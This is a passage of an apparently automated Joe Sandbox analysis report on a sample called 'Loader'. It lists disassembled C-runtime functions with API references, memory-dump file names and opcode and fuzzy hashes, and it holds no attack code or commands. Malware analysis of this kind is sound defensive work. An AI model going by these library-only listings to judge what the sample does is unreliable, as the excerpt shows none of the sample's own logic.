                                                                                          • __alloca_probe_16.LIBCMT ref: 003442F3
                                                                                          • __alloca_probe_16.LIBCMT ref: 00344382
                                                                                          • __freea.LIBCMT ref: 003443CD
                                                                                          • __freea.LIBCMT ref: 003443D3
                                                                                          • __freea.LIBCMT ref: 00344409
                                                                                          • __freea.LIBCMT ref: 0034440F
                                                                                          • __freea.LIBCMT ref: 0034441F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                          • String ID:
                                                                                          • API String ID: 127012223-0
                                                                                          • Opcode ID: 843ac4146b43c1fa775d9d25e1b9eb78b8d09c96f97a63be4ce21bce6a9f9e8c
                                                                                          • Instruction ID: bbe83e61c24784104688c445400c4bf9fb257c9af3f71115031e16d73b20a00e
                                                                                          • Opcode Fuzzy Hash: 843ac4146b43c1fa775d9d25e1b9eb78b8d09c96f97a63be4ce21bce6a9f9e8c
                                                                                          • Instruction Fuzzy Hash: A3710472900259ABDF239E959C82BAE77F9AF49710F2A0539F904BF281D775BC108750
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strrchr
                                                                                          • String ID:
                                                                                          • API String ID: 3213747228-0
                                                                                          • Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                          • Instruction ID: 6d79685e0c2747eaea848289b804a42b9ab23d8f486748fcfb1b4f2673e8b016
                                                                                          • Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                          • Instruction Fuzzy Hash: 2CB12672A003559FDB138F24CCC2BAEBBA5EF55350F294165FA05AF282DB74D941C7A0
                                                                                          APIs
                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00334E2B
                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 003350A4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallUnexpectedtype_info::operator==
                                                                                          • String ID: csm$csm$csm$xf4
                                                                                          • API String ID: 2673424686-2576437276
                                                                                          • Opcode ID: 3d12451c104b19b514fa68dba9808521b99e6a89b992400e161383438ef1a432
                                                                                          • Instruction ID: ecbfcbb52abac7ba72d48bf79c56ca2601a79c4a369c954a59224a9cbde117ae
                                                                                          • Opcode Fuzzy Hash: 3d12451c104b19b514fa68dba9808521b99e6a89b992400e161383438ef1a432
                                                                                          • Instruction Fuzzy Hash: 70B18831800219EFCF1ADFA5D8C19AEBBB5BF14300F16456AE9156F212C331EA51CB91
                                                                                          APIs
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0032ABA7
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0032ABAF
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0032AC38
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0032AC63
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0032ACB8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                          • String ID: csm
                                                                                          • API String ID: 1170836740-1018135373
                                                                                          • Opcode ID: e24b4aa2e2e4209cfaf7e3b3196245ba70361da3fed1de9d5ec385b482f32a7f
                                                                                          • Instruction ID: 02322ada8c7d2987d8e7e2810c14ea0c0eeb8b78d7a9ada5d1137cf792450df7
                                                                                          • Opcode Fuzzy Hash: e24b4aa2e2e4209cfaf7e3b3196245ba70361da3fed1de9d5ec385b482f32a7f
                                                                                          • Instruction Fuzzy Hash: E341D134A00A389BCF16DF68E881A9EBBB5BF05324F158155E8159F352CB35EA05CFD2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e3bec364397e5842097b76dedbd7d68ef1add4973839a2b1947dbd71315bbd6f
                                                                                          • Instruction ID: 540a5341f5203e5e223cfc8acceab2854a902cb909159860d5598a557f7da970
                                                                                          • Opcode Fuzzy Hash: e3bec364397e5842097b76dedbd7d68ef1add4973839a2b1947dbd71315bbd6f
                                                                                          • Instruction Fuzzy Hash: AAB1A270A04249AFDB13DFA9C881BAEBBF5BF4A310F554258E4059F292D771AE41CB60
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,00334424,0032A93D,00329B94), ref: 0033443B
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00334449
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00334462
                                                                                          • SetLastError.KERNEL32(00000000,00334424,0032A93D,00329B94), ref: 003344B4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: 5ec5f6dd04dfbda11966307a201332a54bc5484e944785ecb759e2612f6156f1
                                                                                          • Instruction ID: 5f37e4225c9c40677a6d429e3e28a0ec4a97d1aa88f92eba13736c459f04d0d7
                                                                                          • Opcode Fuzzy Hash: 5ec5f6dd04dfbda11966307a201332a54bc5484e944785ecb759e2612f6156f1
                                                                                          • Instruction Fuzzy Hash: 3B01F73250A7116EF72B2B76BCC5A6B2A8CEB5277AF200339F510691F1FF526C015280
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,DAF5BA3C,?,?,00000000,00345644,000000FF,?,0032F279,0032F160,?,0032F315,00000000), ref: 0032F1ED
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0032F1FF
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00345644,000000FF,?,0032F279,0032F160,?,0032F315,00000000), ref: 0032F221
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: fa6567375c21b59de27572fae9f6ce553544b4f205f329b87cbd08133f5be99f
                                                                                          • Instruction ID: c0d5511847f96dd9e7067bdcd1c1fc72786e63df5b4519fb723e11832b84fa20
                                                                                          • Opcode Fuzzy Hash: fa6567375c21b59de27572fae9f6ce553544b4f205f329b87cbd08133f5be99f
                                                                                          • Instruction Fuzzy Hash: D9018439940629EFDB139B50EC45FAEBBF8FB05B12F010625E811A62A0DB74A800CA90
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 003277B9
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 003277C4
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00327832
                                                                                            • Part of subcall function 003276AF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 003276C7
                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 003277DF
                                                                                          • _Yarn.LIBCPMT ref: 003277F5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                          • String ID:
                                                                                          • API String ID: 1088826258-0
                                                                                          • Opcode ID: fb14af988626b80cd22ba13bf44b734b5c77d6c083c7cfc91f43d7ee7bd6a1c8
                                                                                          • Instruction ID: 099251ce804f2185c58b59a94d1ae8aea9c1ad6e21ce91ae3e161f762c67a148
                                                                                          • Opcode Fuzzy Hash: fb14af988626b80cd22ba13bf44b734b5c77d6c083c7cfc91f43d7ee7bd6a1c8
                                                                                          • Instruction Fuzzy Hash: 0E015A79A045309BC707FF20E85667DBBA9BF85751F154049E8025B392DF38AE42CBC1
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0033F70C,00000000,?,00351E20,?,?,?,0033F643,00000004,InitializeCriticalSectionEx,003490D4,003490DC), ref: 0033F67D
                                                                                          • GetLastError.KERNEL32(?,0033F70C,00000000,?,00351E20,?,?,?,0033F643,00000004,InitializeCriticalSectionEx,003490D4,003490DC,00000000,?,0033535C), ref: 0033F687
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0033F6AF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                          • String ID: api-ms-
                                                                                          • API String ID: 3177248105-2084034818
                                                                                          • Opcode ID: a77e0c3dfda40c4e76f4010d69e1335fdd99483f662d6f9bad14af14d95056e7
                                                                                          • Instruction ID: da1af318075267929457468698caac69c5849df7ca4d5367058c5eaa07296067
                                                                                          • Opcode Fuzzy Hash: a77e0c3dfda40c4e76f4010d69e1335fdd99483f662d6f9bad14af14d95056e7
                                                                                          • Instruction Fuzzy Hash: ECE04F31B80208BBEF221B62EC8BB693F99AB11B51F544030F90CEC5F1DBB6BC509944
                                                                                          APIs
                                                                                          • GetConsoleOutputCP.KERNEL32(DAF5BA3C,00000000,00000000,?), ref: 0033D771
                                                                                            • Part of subcall function 003357C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00336F95,?,00000000,-00000008), ref: 00335822
                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0033D9C3
                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0033DA09
                                                                                          • GetLastError.KERNEL32 ref: 0033DAAC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                          • String ID:
                                                                                          • API String ID: 2112829910-0
                                                                                          • Opcode ID: 96f0df2b3df61f0e6d5bbed74a2cbd0c029448504f8ecd1daca0f0aea765d495
                                                                                          • Instruction ID: c97ae3ffe55881d7aa2ea1e589801fd792c09750d1a9ab735be70b27537c798d
                                                                                          • Opcode Fuzzy Hash: 96f0df2b3df61f0e6d5bbed74a2cbd0c029448504f8ecd1daca0f0aea765d495
                                                                                          • Instruction Fuzzy Hash: 59D15A75D042589FCF16CFA8D9C0AEDBBB9FF09314F24416AE456EB351E630A942CB50
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPointer
                                                                                          • String ID:
                                                                                          • API String ID: 1740715915-0
                                                                                          • Opcode ID: 9cf5cb795e276bdb9ece72258ac1a13eb82210cc1582aeaa145bb8f80025da94
                                                                                          • Instruction ID: 0f36c6c0b9de24b54d2a445dae6be7ef00d042e03ebb72b7ddea7f223fe4624b
                                                                                          • Opcode Fuzzy Hash: 9cf5cb795e276bdb9ece72258ac1a13eb82210cc1582aeaa145bb8f80025da94
                                                                                          • Instruction Fuzzy Hash: D751EF72604616AFDB2B8F14E8C1BAAB3B8EF40311F15456DE8858B690E731FC80CB90
                                                                                          APIs
                                                                                            • Part of subcall function 003357C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00336F95,?,00000000,-00000008), ref: 00335822
                                                                                          • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0033B59A
                                                                                          • __dosmaperr.LIBCMT ref: 0033B5A1
                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0033B5DB
                                                                                          • __dosmaperr.LIBCMT ref: 0033B5E2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1913693674-0
                                                                                          • Opcode ID: d162ae35e26b645138df43992a6de4c67a359f0edc176c92112b08296593c8fa
                                                                                          • Instruction ID: f5fd6a269333927a284a3e2ed754f13fbbae4b8a3d220de32f73ed1de2ddc596
                                                                                          • Opcode Fuzzy Hash: d162ae35e26b645138df43992a6de4c67a359f0edc176c92112b08296593c8fa
                                                                                          • Instruction Fuzzy Hash: BB21D771600219EFEB12AF66D8C186BF7ADFF05364F118518FA19DB550DB30ED508B90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 211ba87a4fa8f836cbb43104489fdf96be5810e0eeaa5e63018dbb0e942599f3
                                                                                          • Instruction ID: a3a4f81e72900beba9e485ff516f18264473dec5e7e17c223b933be253bb48bc
                                                                                          • Opcode Fuzzy Hash: 211ba87a4fa8f836cbb43104489fdf96be5810e0eeaa5e63018dbb0e942599f3
                                                                                          • Instruction Fuzzy Hash: BE21C33161022AAF9B22EF75EC8196FB7ACFF043A4B119514F819DB550DB30EC408B90
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0033C936
                                                                                            • Part of subcall function 003357C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00336F95,?,00000000,-00000008), ref: 00335822
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0033C96E
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0033C98E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 158306478-0
                                                                                          • Opcode ID: c231ae0d16a7c9caa4f7e287b2f52ff715ef08aee4b3f37ac2f842b827496f72
                                                                                          • Instruction ID: b9e23c3a4684b0f88eb2fddafb935c62a2524f2350c7ca024fbc17dff3d4e221
                                                                                          • Opcode Fuzzy Hash: c231ae0d16a7c9caa4f7e287b2f52ff715ef08aee4b3f37ac2f842b827496f72
                                                                                          • Instruction Fuzzy Hash: 6F11C0B6511A15BFAB1327B25CCAD7F7A9CEE96794F521029F802E9100FF209D0087B0
                                                                                          APIs
                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,0034399F,00000000,00000001,?,?,?,0033DB00,?,00000000,00000000), ref: 00344467
                                                                                          • GetLastError.KERNEL32(?,0034399F,00000000,00000001,?,?,?,0033DB00,?,00000000,00000000,?,?,?,0033D446,?), ref: 00344473
                                                                                            • Part of subcall function 003444D0: CloseHandle.KERNEL32(FFFFFFFE,00344483,?,0034399F,00000000,00000001,?,?,?,0033DB00,?,00000000,00000000,?,?), ref: 003444E0
                                                                                          • ___initconout.LIBCMT ref: 00344483
                                                                                            • Part of subcall function 003444A5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00344441,0034398C,?,?,0033DB00,?,00000000,00000000,?), ref: 003444B8
                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,0034399F,00000000,00000001,?,?,?,0033DB00,?,00000000,00000000,?), ref: 00344498
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                          • String ID:
                                                                                          • API String ID: 2744216297-0
                                                                                          • Opcode ID: 9880fee077bb2132693240697e7f69305b2b1b4ff4fe205246cccf2304da8577
                                                                                          • Instruction ID: a74fb539fd6841251618fd3680283328e42a474e8c5cc0cd158c1db3c780205b
                                                                                          • Opcode Fuzzy Hash: 9880fee077bb2132693240697e7f69305b2b1b4ff4fe205246cccf2304da8577
                                                                                          • Instruction Fuzzy Hash: D7F0C73A501219BBCF231F95EC49B993F6AFB457B5F164420F918AD230DB31A8209B91
                                                                                          APIs
                                                                                            • Part of subcall function 0033590A: GetLastError.KERNEL32(00000000,?,00337C8D), ref: 0033590E
